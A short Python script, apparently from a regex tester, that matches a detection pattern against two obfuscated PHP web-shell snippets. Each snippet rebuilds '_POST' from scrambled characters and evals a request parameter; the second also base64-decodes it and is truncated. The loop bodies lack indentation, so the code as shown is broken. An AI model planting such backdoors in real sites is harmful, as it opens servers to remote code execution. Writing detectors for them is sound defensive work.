import re
regex = re.compile(r"\$(.*)(\s?)=(\s?)\"(.*)\"(\s?);(\s?)\$(.*)eval")
test_str = ("$sqm3 = \"_pesoutr\" ; $exr40= $sqm3[3]. $sqm3[6]. $sqm3[7].$sqm3[6]. $sqm3[4].$sqm3[5].$sqm3[1]. $sqm3[1]. $sqm3[2]. $sqm3[7]; $rgjf3 =$exr40 ($sqm3[0].$sqm3[1] .$sqm3[4].$sqm3[3]. $sqm3[6] );if ( isset ( ${$rgjf3} ['q42dabb'] ) ) {eval(${ $rgjf3}[ 'q42dabb']) ; }?>\n\n"
"$ucz65= \"osb46detp_ac\";$zxg6 = strtolower ( $ucz65[2].$ucz65[10]. $ucz65[1].$ucz65[6]. $ucz65[4]. $ucz65[3] .$ucz65[9] . $ucz65[5].$ucz65[6]. $ucz65[11].$ucz65[0]. $ucz65[5]. $ucz65[6]); $tov98= strtoupper ($ucz65[9]. $ucz65[8].$ucz65[0]. $ucz65[1]. $ucz65[7]) ;if (isset(${ $tov98 } ['n42dabb' ])){eval ($zxg6 ( ${ $t")
matches = regex.finditer(test_str)
for match_num, match in enumerate(matches, start=1):
print(f"Match {match_num} was found at {match.start()}-{match.end()}: {match.group()}")
for group_num, group in enumerate(match.groups(), start=1):
print(f"Group {group_num} found at {match.start(group_num)}-{match.end(group_num)}: {group}")